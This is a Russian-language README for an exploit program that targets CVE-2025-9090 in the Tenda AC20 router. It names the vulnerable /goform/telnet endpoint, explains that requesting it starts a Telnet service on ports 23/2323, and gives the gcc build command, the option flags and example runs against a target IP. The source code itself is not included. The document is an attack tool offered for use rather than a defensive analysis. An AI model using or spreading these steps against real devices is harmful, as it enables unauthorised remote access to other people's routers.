
Внедрение команд в Tenda AC20 16.03.08.12 (/goform/telnet)
Автор: Byte Reaper
Этот эксплойт нацелен на CVE-2025-9090 — уязвимость внедрения команд в маршрутизаторе Tenda AC20 (v16.03.08.12).
Проблема находится в конечной точке /goform/telnet, которая может быть вызвана удалённо.
При обращении она запускает службу Telnet на устройстве, открывая порты 23/2323 для удалённого взаимодействия.
Программа отправляет запрос к уязвимой конечной точке, ищет строку ответа "load telnetd success" и затем пытается подключиться к службе Telnet, чтобы подтвердить успешную эксплуатацию.
Скомпилируйте с помощью gcc:
gcc exploit.c argparse.c -o CVE-2025-9090 -lcurl
-h, --help показать это справочное сообщение и выйти
-i, --ip ввести IP-адрес цели
-c, --cookies указать файл cookie
-v, --verbose подробный режим
-f, --loop= количество запросов
./CVE-2025-9090 -i <IP>
- подробный режим :
./CVE-2025-9090 -i <IP> -v
- количество запросов :
./CVE-2025-9090 -i <IP> -v -f 5 (5 POST запросов)
- файл cookie :
./CVE-2025-9090 -i <IP> -v -f 5 -c [имя файла]
MIT